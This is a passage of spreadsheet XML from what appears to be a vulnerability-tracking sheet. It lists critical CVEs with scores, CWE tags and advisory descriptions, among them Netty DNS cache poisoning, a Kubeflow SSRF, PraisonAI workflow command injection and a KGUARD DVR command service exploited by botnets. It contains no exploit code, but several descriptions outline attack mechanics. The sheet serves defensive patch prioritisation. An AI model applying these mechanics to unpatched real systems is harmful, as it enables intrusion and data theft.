          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, an attacker who can influence the target URL of an Axios request can use any address in the 127.0.0.0/8 range (other than 127.0.0.1) to completely bypass the NO_PROXY protection. This vulnerability is due to an incomplete for CVE-2025-62718, This vulnerability is fixed in 1.15.1 and 0.31.1.</t>
        </is>
      </c>
      <c r="M25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42043</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44756</t>
        </is>
      </c>
      <c r="C26" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E26" s="5" t="inlineStr"/>
      <c r="F26" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L26" s="5" t="inlineStr">
        <is>
          <t>A memory safety vulnerability exists in the Extended Passport Protocol (EPP) processing library. Under specific conditions, an unauthenticated attacker could exploit a crafted network request containing a malformed EPP header, potentially resulting in undefined behavior and abnormal program termination. Successful exploitation may have a high impact on the confidentiality, integrity, and availability of the application.</t>
        </is>
      </c>
      <c r="M26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44756</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45674</t>
        </is>
      </c>
      <c r="C27" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E27" s="5" t="inlineStr"/>
      <c r="F27" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I27" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-346</t>
        </is>
      </c>
      <c r="L27" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, Netty's DnsResolveContext fails to validate the origin (bailiwick) of CNAME records in DNS responses. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45674</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47691</t>
        </is>
      </c>
      <c r="C28" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E28" s="5" t="inlineStr"/>
      <c r="F28" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G28" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H28" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I28" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-346</t>
        </is>
      </c>
      <c r="L28" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, Netty's `DnsResolveContext` insufficiently validates the bailiwick of NS records, enabling DNS Cache Poisoning. An attacker controlling an authoritative name server for a subdomain can poison the cache for parent domains (like `.co.uk`). In `io.netty.resolver.dns.DnsResolveContext.AuthoritativeNameServerList#add` method accepts any NS record from the AUTHORITY section as long as the record's name is a suffix of the questionName. Subsequently, the `handleWithAdditional` method caches the associated A records from the ADDITIONAL section directly into the `authoritativeDnsServerCache` under the parent domain's key. This bypasses standard bailiwick rules, where a server authoritative for a subdomain should not be trusted to provide authoritative records for its parent. The poisoned cache is then used for all future resolutions under the parent domain's key. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47691</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48056</t>
        </is>
      </c>
      <c r="C29" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E29" s="5" t="inlineStr"/>
      <c r="F29" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-749</t>
        </is>
      </c>
      <c r="L29" s="5" t="inlineStr">
        <is>
          <t>Streambert is a cross-platform Electron Desktop App to stream and download video content. Versions prior to 2.5.0  improperly validate executable paths supplied to the  run-download  IPC handler, allowing a compromised renderer process to execute arbitrary local binaries with the application’s privileges. Version 2.5.0 contains a patch.</t>
        </is>
      </c>
      <c r="M29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48056</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48168</t>
        </is>
      </c>
      <c r="C30" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E30" s="5" t="inlineStr"/>
      <c r="F30" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L30" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. In versions prior to 4.6.40, the bundled Claude GitHub Actions workflow is vulnerable to command injection because it embeds an attacker-controlled pull request branch name into a Bash run: block without quoting or validation. Additionally, the workflow allows any @claude comment to trigger the job regardless of whether the commenter is a trusted collaborator. An outside contributor can open a pull request from a fork whose branch name contains shell metacharacters and comment @claude, causing Bash to execute arbitrary shell code in the GitHub Actions runner. Because these commands run in a job holding a GitHub App token with write permissions, OIDC access, and gh/git access, the injection can be chained through $GITHUB_PATH to compromise later privileged steps, enabling repository writes, pull request and issue manipulation, or OIDC-token abuse. This issue has been fixed in version 4.6.40.</t>
        </is>
      </c>
      <c r="M30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48168</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49883</t>
        </is>
      </c>
      <c r="C31" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E31" s="5" t="inlineStr"/>
      <c r="F31" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G31" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L31" s="5" t="inlineStr">
        <is>
          <t>In checkReadPermission of PermissionsManager.java, there is a possible way to monitor sensitive device state data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49883</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54745</t>
        </is>
      </c>
      <c r="C32" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E32" s="5" t="inlineStr"/>
      <c r="F32" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G32" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-918</t>
        </is>
      </c>
      <c r="L32" s="5" t="inlineStr">
        <is>
          <t>Kubeflow Pipelines enables users to build and deploy portable, scalable machine learning workflows. Prior to 2.17.0, the Kubeflow Pipelines frontend exposes an unauthenticated server-side request forgery vulnerability through the /_proxy/ route in frontend/server/proxy-middleware.ts. The _routePathWithReferer() function accepts an arbitrary attacker-controlled HTTP or HTTPS target and passes its origin to createProxyMiddleware without a host allowlist or filtering for loopback, link-local, RFC1918, or cluster-local addresses. The route remains outside the authorization middleware when ENABLE_AUTHZ=true and is reachable through /apis/v1beta1/_proxy/, /apis/v2beta1/_proxy/, /pipeline/apis/v1beta1/_proxy/, and /pipeline/apis/v2beta1/_proxy/, including through a crafted Referer header. Requests can forward attacker-controlled methods, headers such as Authorization, Cookie, and X-Forwarded-For, and POST bodies to reachable internal services, while returning the upstream response to the unauthenticated client. This can expose cloud metadata credentials, Kubernetes or service APIs, and other cluster-internal endpoints to unauthorized read or modification. This issue is fixed in version 2.17.0.</t>
        </is>
      </c>
      <c r="M32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54745</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65956</t>
        </is>
      </c>
      <c r="C33" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E33" s="5" t="inlineStr"/>
      <c r="F33" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G33" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L33" s="5" t="inlineStr">
        <is>
          <t>KubePi is a Kubernetes multi-cluster management panel. In versions up to and including 1.6.15, the SSO configuration API endpoints are exposed on the same public routing boundary as the SSO login and callback endpoints, so SSO, OIDC, and SAML management operations can be reached without administrator authorization. Because reading, creating, and updating the global SSO configuration is not restricted to administrators, an unauthorized or low-privileged user can inspect or alter the authentication configuration, which under certain conditions can lead to account takeover or privilege escalation. The SSO connectivity-test function can additionally be abused as a server-side request forgery primitive, and the user list API returns user objects without consistently clearing authentication-related fields. This issue is fixed in version 2.0.0.</t>
        </is>
      </c>
      <c r="M33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65956</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70352</t>
        </is>
      </c>
      <c r="C34" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E34" s="5" t="inlineStr"/>
      <c r="F34" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G34" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L34" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Azure AI Language allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70352</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73299</t>
        </is>
      </c>
      <c r="C35" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E35" s="5" t="inlineStr"/>
      <c r="F35" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G35" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L35" s="5" t="inlineStr">
        <is>
          <t>Prompty is a markdown file format (.prompty) for LLM prompts. Prior to 0.1.5 and 2.0.0-beta.5, the TypeScript Nunjucks renderer evaluated untrusted .prompty template bodies with unrestricted JavaScript member access. An attacker-controlled template could traverse constructor and prototype properties to execute JavaScript in the host Node.js process. This issue is fixed in versions 0.1.5 and 2.0.0-beta.5.</t>
        </is>
      </c>
      <c r="M35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73299</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75754</t>
        </is>
      </c>
      <c r="C36" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E36" s="5" t="inlineStr"/>
      <c r="F36" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-798, CWE-918</t>
        </is>
      </c>
      <c r="L36" s="5" t="inlineStr">
        <is>
          <t>Missing Authentication for Critical Function, Server-Side Request Forgery (SSRF), and Use of Hard-coded Credentials in ASUS Control Center allow an unauthorized user to obtain the encryption key via an HTTP request, causing a local service to enable SSH on port 2222. The attacker can then log in with the hardcode credentials to obtain a root shell, enabling direct reading, writing, and deletion of data on ASUS Control Center, as well as remote control of all servers, PCs, and workstations within the company.
Refer to the 'Security Update for ASUS Control Center' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="M36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75754</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77770</t>
        </is>
      </c>
      <c r="C37" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E37" s="5" t="inlineStr"/>
      <c r="F37" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L37" s="5" t="inlineStr">
        <is>
          <t>The miniOrange 2FA  WordPress plugin before 6.3.1, miniOrange 2FA  WordPress plugin before 19.3 does not require a validated transaction before deleting site options whose names come from unauthenticated request input, allowing any visitor to delete arbitrary options, which can lock every administrator out of the dashboard or deactivate every miniOrange 2FA  WordPress plugin before 6.3.1, miniOrange 2FA  WordPress plugin before 19.3 on the site.</t>
        </is>
      </c>
      <c r="M37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77770</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79696</t>
        </is>
      </c>
      <c r="C38" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E38" s="5" t="inlineStr"/>
      <c r="F38" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G38" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L38" s="5" t="inlineStr">
        <is>
          <t>A Code Injection vulnerability in adk web in Google Cloud Agent Development Kit (ADK) for Python versions 2.0.0 through 2.6.0 on Python (OSS), Cloud Run, and GKE environments where pytest is installed allows an unauthenticated remote attacker to execute arbitrary code using a crafted test session replay.</t>
        </is>
      </c>
      <c r="M38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79696</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80098</t>
        </is>
      </c>
      <c r="C39" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E39" s="5" t="inlineStr"/>
      <c r="F39" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G39" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H39" s="5" t="inlineStr">
        <is>
          <t>microsoft:copilot_studio</t>
        </is>
      </c>
      <c r="I39" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L39" s="5" t="inlineStr">
        <is>
          <t>Improper verification of cryptographic signature in Copilot Studio allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80098</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82004</t>
        </is>
      </c>
      <c r="C40" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E40" s="5" t="inlineStr"/>
      <c r="F40" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr">
        <is>
          <t>adobe:campaign</t>
        </is>
      </c>
      <c r="I40" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L40" s="5" t="inlineStr">
        <is>
          <t>Adobe Campaign Classic (ACC) is affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82004</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83711</t>
        </is>
      </c>
      <c r="C41" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D41" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E41" s="5" t="inlineStr"/>
      <c r="F41" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G41" s="5" t="inlineStr">
        <is>
          <t>microsoft, azure, active directory</t>
        </is>
      </c>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L41" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Microsoft Azure Active Directory B2C allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83711</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85061</t>
        </is>
      </c>
      <c r="C42" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E42" s="5" t="inlineStr"/>
      <c r="F42" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L42" s="5" t="inlineStr">
        <is>
          <t>MapLibre GL JS is an interactive vector tile map library for web browsers. Prior to 6.4.1, DOM.sanitize() in src/util/dom.ts iterates elem.attributes as a live NamedNodeMap while removeAttributes() removes attributes from the same collection, shifting indexes and skipping an adjacent dangerous attribute. An attacker who controls untrusted third-party style attribution strings or user-supplied custom attributions can supply consecutive dangerous attributes, causing an attribute such as onload or ontoggle to survive sanitization and execute when the attribution control inserts the content into innerHTML. A victim must render the affected map content for the script to execute. This issue is fixed in version 6.4.1.</t>
        </is>
      </c>
      <c r="M42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85061</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85978</t>
        </is>
      </c>
      <c r="C43" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D43" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E43" s="5" t="inlineStr"/>
      <c r="F43" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr">
        <is>
          <t>CWE-41, CWE-863, CWE-94</t>
        </is>
      </c>
      <c r="L43" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote code execution vulnerability exists in the Policy Manager console of Akana API Platform. A path normalization discrepancy between the authentication filter and the servlet dispatcher allows a crafted request to bypass authentication and reach an endpoint that evaluates attacker-supplied script code without sandboxing, resulting in arbitrary code execution. Exploitation requires no authentication or user interaction.</t>
        </is>
      </c>
      <c r="M43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85978</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86152</t>
        </is>
      </c>
      <c r="C44" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D44" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E44" s="5" t="inlineStr"/>
      <c r="F44" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L44" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Tenda CP3 27.5.57.101. The impacted element is the function CAutoAddWifi::ThreadProc of the file Functions/AutoAddWifi.cpp of the component Kylin. Executing a manipulation can lead to os command injection. The attack may be launched remotely.</t>
        </is>
      </c>
      <c r="M44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86152</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87827</t>
        </is>
      </c>
      <c r="C45" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D45" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E45" s="5" t="inlineStr"/>
      <c r="F45" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr">
        <is>
          <t>CWE-1188</t>
        </is>
      </c>
      <c r="L45" s="5" t="inlineStr">
        <is>
          <t>Certain KGUARD DVR devices running vulnerable firmware expose a system command execution service on all network interfaces without requiring authentication. A remote unauthenticated attacker with network access to the affected service can execute arbitrary system commands on the device, potentially resulting in complete compromise of the DVR.
The vulnerability is known to have been exploited in the wild by the Mirai_ptea (Rimasuta) and Mirai_aurora botnets for malware propagation and subsequent DDoS activity. The vulnerability was reported to affect firmware dating from 2016, while firmware released after 2017 appears to mitigate the issue by restricting the affected service to the localhost interface (127.0.0.1) instead of exposing it on all interfaces (0.0.0.0).
The affected-device list reported by Netlab includes many D1004NR, D1008NR, D1016NR, D1104, D1104NR, D1108NR, D1116NR, D1132NR, D2116NR, D97xx, D98xx, and D99xx variants and several associated hardware revisions
The exploit is included in some version of rapperbot and exploited in 2026. This assignment has been made to document the active exploitation and lack of documentation from the vendor.</t>
        </is>
      </c>
      <c r="M45" s="6" t="inlineStr">
        <is>
